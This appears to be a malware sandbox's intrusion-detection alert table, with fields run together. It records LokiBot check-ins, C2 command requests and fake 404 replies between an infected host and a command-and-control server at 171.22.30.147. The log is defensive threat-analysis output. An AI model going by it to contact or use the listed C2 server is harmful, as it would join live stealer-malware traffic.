              192.168.2.3171.22.30.14749704802025381 01/05/23-08:52:08.934535TCP2025381ET TROJAN LokiBot Checkin4970480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750032802025381 01/05/23-08:53:49.938594TCP2025381ET TROJAN LokiBot Checkin5003280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749886802825766 01/05/23-08:53:05.845633TCP2825766ETPRO TROJAN LokiBot Checkin M24988680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749923802825766 01/05/23-08:53:17.329996TCP2825766ETPRO TROJAN LokiBot Checkin M24992380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749726802024318 01/05/23-08:52:18.702884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749821802021641 01/05/23-08:52:46.829983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750059802024318 01/05/23-08:53:57.279795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749844802024318 01/05/23-08:52:54.549139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750009802025381 01/05/23-08:53:42.368696TCP2025381ET TROJAN LokiBot Checkin5000980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750013802024318 01/05/23-08:53:43.455950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750059802024313 01/05/23-08:53:57.279795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749844802024313 01/05/23-08:52:54.549139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749827802025381 01/05/23-08:52:48.461129TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750013802024313 01/05/23-08:53:43.455950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749888802025381 01/05/23-08:53:06.392338TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749939802024313 01/05/23-08:53:21.632432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749890802021641 01/05/23-08:53:06.934564TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749939802024318 01/05/23-08:53:21.632432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498242025483 01/05/23-08:52:47.720430TCP2025483ET TROJAN LokiBot Fake 404 Response8049824171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749974802025381 01/05/23-08:53:33.106432TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498022025483 01/05/23-08:52:41.721047TCP2025483ET TROJAN LokiBot Fake 404 Response8049802171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750030802825766 01/05/23-08:53:49.383588TCP2825766ETPRO TROJAN LokiBot Checkin M25003080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749859802021641 01/05/23-08:52:58.622571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749702802825766 01/05/23-08:52:08.155254TCP2825766ETPRO TROJAN LokiBot Checkin M24970280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498802025483 01/05/23-08:53:04.312009TCP2025483ET TROJAN LokiBot Fake 404 Response8049880171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749956802825766 01/05/23-08:53:26.250117TCP2825766ETPRO TROJAN LokiBot Checkin M24995680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749768802021641 01/05/23-08:52:30.564042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749910802825766 01/05/23-08:53:13.740225TCP2825766ETPRO TROJAN LokiBot Checkin M24991080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749735802825766 01/05/23-08:52:21.259701TCP2825766ETPRO TROJAN LokiBot Checkin M24973580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750063802825766 01/05/23-08:53:58.331391TCP2825766ETPRO TROJAN LokiBot Checkin M25006380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750026802024318 01/05/23-08:53:48.341265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749854802021641 01/05/23-08:52:57.240558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750026802024313 01/05/23-08:53:48.341265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749877802024313 01/05/23-08:53:03.433942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749906802024313 01/05/23-08:53:12.686115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749948802825766 01/05/23-08:53:24.079081TCP2825766ETPRO TROJAN LokiBot Checkin M24994880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750003802021641 01/05/23-08:53:40.763519TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749877802024318 01/05/23-08:53:03.433942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749929802021641 01/05/23-08:53:18.948979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498652025483 01/05/23-08:53:00.312861TCP2025483ET TROJAN LokiBot Fake 404 Response8049865171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749906802024318 01/05/23-08:53:12.686115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749735802021641 01/05/23-08:52:21.259701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750063802021641 01/05/23-08:53:58.331391TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750021802024313 01/05/23-08:53:46.361205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498542025483 01/05/23-08:52:57.330801TCP2025483ET TROJAN LokiBot Fake 404 Response8049854171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749943802825766 01/05/23-08:53:22.718924TCP2825766ETPRO TROJAN LokiBot Checkin M24994380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498432025483 01/05/23-08:52:54.345838TCP2025483ET TROJAN LokiBot Fake 404 Response8049843171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750068802021641 01/05/23-08:53:59.646284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749907802024313 01/05/23-08:53:12.956728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749901802024318 01/05/23-08:53:11.357263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500402025483 01/05/23-08:53:52.223381TCP2025483ET TROJAN LokiBot Fake 404 Response8050040171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749708802021641 01/05/23-08:52:10.789251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749907802024318 01/05/23-08:53:12.956728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749771802825766 01/05/23-08:52:31.374001TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749761802025381 01/05/23-08:52:28.591148TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749850802025381 01/05/23-08:52:56.172529TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499692025483 01/05/23-08:53:31.862339TCP2025483ET TROJAN LokiBot Fake 404 Response8049969171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750030802021641 01/05/23-08:53:49.383588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750062802825766 01/05/23-08:53:58.073723TCP2825766ETPRO TROJAN LokiBot Checkin M25006280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749978802025381 01/05/23-08:53:34.155329TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500812025483 01/05/23-08:54:03.316072TCP2025483ET TROJAN LokiBot Fake 404 Response8050081171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749883802025381 01/05/23-08:53:05.037332TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749889802025381 01/05/23-08:53:06.674333TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749724802025381 01/05/23-08:52:18.098497TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750069802021641 01/05/23-08:53:59.913079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749794802025381 01/05/23-08:52:39.439392TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749834802021641 01/05/23-08:52:50.512718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749926802024318 01/05/23-08:53:18.143087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750059802825766 01/05/23-08:53:57.279795TCP2825766ETPRO TROJAN LokiBot Checkin M25005980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499282025483 01/05/23-08:53:18.757059TCP2025483ET TROJAN LokiBot Fake 404 Response8049928171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749892802025381 01/05/23-08:53:07.470439TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749767802825766 01/05/23-08:52:30.299348TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749926802024313 01/05/23-08:53:18.143087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749780802025381 01/05/23-08:52:35.511333TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749918802025381 01/05/23-08:53:15.920283TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749808802024313 01/05/23-08:52:43.325468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749987802025381 01/05/23-08:53:36.549688TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750043802825766 01/05/23-08:53:52.949985TCP2825766ETPRO TROJAN LokiBot Checkin M25004380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750072802021641 01/05/23-08:54:00.683642TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749713802024313 01/05/23-08:52:12.826844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749808802024318 01/05/23-08:52:43.325468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749897802024313 01/05/23-08:53:09.055046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749705802025381 01/05/23-08:52:09.363911TCP2025381ET TROJAN LokiBot Checkin4970580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749857802825766 01/05/23-08:52:58.054307TCP2825766ETPRO TROJAN LokiBot Checkin M24985780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749963802024313 01/05/23-08:53:30.141323TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749897802024318 01/05/23-08:53:09.055046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749963802024318 01/05/23-08:53:30.141323TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498352025483 01/05/23-08:52:50.990352TCP2025483ET TROJAN LokiBot Fake 404 Response8049835171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749823802025381 01/05/23-08:52:47.379297TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749910802024318 01/05/23-08:53:13.740225TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749755802021641 01/05/23-08:52:26.961334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749768802825766 01/05/23-08:52:30.564042TCP2825766ETPRO TROJAN LokiBot Checkin M24976880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749912802025381 01/05/23-08:53:14.329479TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749910802024313 01/05/23-08:53:13.740225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499582025483 01/05/23-08:53:27.313519TCP2025483ET TROJAN LokiBot Fake 404 Response8049958171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749793802025381 01/05/23-08:52:39.171445TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499392025483 01/05/23-08:53:21.712762TCP2025483ET TROJAN LokiBot Fake 404 Response8049939171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500702025483 01/05/23-08:54:00.237420TCP2025483ET TROJAN LokiBot Fake 404 Response8050070171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750006802825766 01/05/23-08:53:41.552586TCP2825766ETPRO TROJAN LokiBot Checkin M25000680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499172025483 01/05/23-08:53:15.716958TCP2025483ET TROJAN LokiBot Fake 404 Response8049917171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749713802024318 01/05/23-08:52:12.826844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749722802024313 01/05/23-08:52:17.506386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749811802024318 01/05/23-08:52:44.140113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749976802024313 01/05/23-08:53:33.629058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749811802024313 01/05/23-08:52:44.140113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749976802024318 01/05/23-08:53:33.629058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749982802024313 01/05/23-08:53:35.215314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749722802024318 01/05/23-08:52:17.506386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749777802021641 01/05/23-08:52:34.550245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749982802024318 01/05/23-08:53:35.215314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750046802024313 01/05/23-08:53:53.748051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749782802024318 01/05/23-08:52:36.098088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749909802025381 01/05/23-08:53:13.489642TCP2025381ET TROJAN LokiBot Checkin4990980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497182025483 01/05/23-08:52:15.558526TCP2025483ET TROJAN LokiBot Fake 404 Response8049718171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750046802024318 01/05/23-08:53:53.748051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749782802024313 01/05/23-08:52:36.098088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497292025483 01/05/23-08:52:19.632996TCP2025483ET TROJAN LokiBot Fake 404 Response8049729171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750000802025381 01/05/23-08:53:39.996140TCP2025381ET TROJAN LokiBot Checkin5000080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749764802021641 01/05/23-08:52:29.472789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749995802024313 01/05/23-08:53:38.676723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749737802025381 01/05/23-08:52:21.818381TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750029802025381 01/05/23-08:53:49.112211TCP2025381ET TROJAN LokiBot Checkin5002980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750027802024318 01/05/23-08:53:48.599181TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497072025483 01/05/23-08:52:10.429352TCP2025483ET TROJAN LokiBot Fake 404 Response8049707171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749995802024318 01/05/23-08:53:38.676723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749853802021641 01/05/23-08:52:56.960046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749866802825766 01/05/23-08:53:00.520534TCP2825766ETPRO TROJAN LokiBot Checkin M24986680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750027802024313 01/05/23-08:53:48.599181TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749778802024313 01/05/23-08:52:34.958959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749968802021641 01/05/23-08:53:31.490288TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499842025483 01/05/23-08:53:35.825003TCP2025483ET TROJAN LokiBot Fake 404 Response8049984171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749811802825766 01/05/23-08:52:44.140113TCP2825766ETPRO TROJAN LokiBot Checkin M24981180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500252025483 01/05/23-08:53:48.167670TCP2025483ET TROJAN LokiBot Fake 404 Response8050025171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749873802021641 01/05/23-08:53:02.352866TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749778802024318 01/05/23-08:52:34.958959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749906802825766 01/05/23-08:53:12.686115TCP2825766ETPRO TROJAN LokiBot Checkin M24990680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749985802825766 01/05/23-08:53:36.027311TCP2825766ETPRO TROJAN LokiBot Checkin M24998580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750030802024313 01/05/23-08:53:49.383588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498102025483 01/05/23-08:52:43.945076TCP2025483ET TROJAN LokiBot Fake 404 Response8049810171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499472025483 01/05/23-08:53:23.895642TCP2025483ET TROJAN LokiBot Fake 404 Response8049947171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749735802024313 01/05/23-08:52:21.259701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750030802024318 01/05/23-08:53:49.383588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749745802024318 01/05/23-08:52:24.023320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749939802825766 01/05/23-08:53:21.632432TCP2825766ETPRO TROJAN LokiBot Checkin M24993980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749718802025381 01/05/23-08:52:15.464089TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749745802024313 01/05/23-08:52:24.023320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499062025483 01/05/23-08:53:12.766427TCP2025483ET TROJAN LokiBot Fake 404 Response8049906171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499082025483 01/05/23-08:53:13.297314TCP2025483ET TROJAN LokiBot Fake 404 Response8049908171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750017802024313 01/05/23-08:53:44.537455TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750073802024313 01/05/23-08:54:00.951462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750017802024318 01/05/23-08:53:44.537455TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750073802024318 01/05/23-08:54:00.951462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497612025483 01/05/23-08:52:28.674558TCP2025483ET TROJAN LokiBot Fake 404 Response8049761171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749774802025381 01/05/23-08:52:32.369884TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749869802025381 01/05/23-08:53:01.298022TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749952802825766 01/05/23-08:53:25.200806TCP2825766ETPRO TROJAN LokiBot Checkin M24995280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749975802825766 01/05/23-08:53:33.363507TCP2825766ETPRO TROJAN LokiBot Checkin M24997580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749965802025381 01/05/23-08:53:30.671447TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750083802024318 01/05/23-08:54:03.789158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500622025483 01/05/23-08:53:58.155004TCP2025483ET TROJAN LokiBot Fake 404 Response8050062171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749834802825766 01/05/23-08:52:50.512718TCP2825766ETPRO TROJAN LokiBot Checkin M24983480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749755802024313 01/05/23-08:52:26.961334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749910802021641 01/05/23-08:53:13.740225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500512025483 01/05/23-08:53:55.178783TCP2025483ET TROJAN LokiBot Fake 404 Response8050051171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749755802024318 01/05/23-08:52:26.961334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750083802024313 01/05/23-08:54:03.789158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749922802025381 01/05/23-08:53:17.061545TCP2025381ET TROJAN LokiBot Checkin4992280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750007802024318 01/05/23-08:53:41.829015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750082802825766 01/05/23-08:54:03.532238TCP2825766ETPRO TROJAN LokiBot Checkin M25008280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498212025483 01/05/23-08:52:46.920509TCP2025483ET TROJAN LokiBot Fake 404 Response8049821171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749879802025381 01/05/23-08:53:03.965987TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750007802024313 01/05/23-08:53:41.829015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749929802825766 01/05/23-08:53:18.948979TCP2825766ETPRO TROJAN LokiBot Checkin M24992980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500142025483 01/05/23-08:53:43.800760TCP2025483ET TROJAN LokiBot Fake 404 Response8050014171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749722802021641 01/05/23-08:52:17.506386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750016802021641 01/05/23-08:53:44.267939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749748802825766 01/05/23-08:52:24.879047TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749709802024313 01/05/23-08:52:11.256691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749962802825766 01/05/23-08:53:29.855666TCP2825766ETPRO TROJAN LokiBot Checkin M24996280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749965802825766 01/05/23-08:53:30.671447TCP2825766ETPRO TROJAN LokiBot Checkin M24996580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749709802024318 01/05/23-08:52:11.256691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749900802021641 01/05/23-08:53:10.997847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749787802825766 01/05/23-08:52:37.509502TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749863802021641 01/05/23-08:52:59.703117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497492025483 01/05/23-08:52:25.244471TCP2025483ET TROJAN LokiBot Fake 404 Response8049749171.22.30.147192.168.2.3
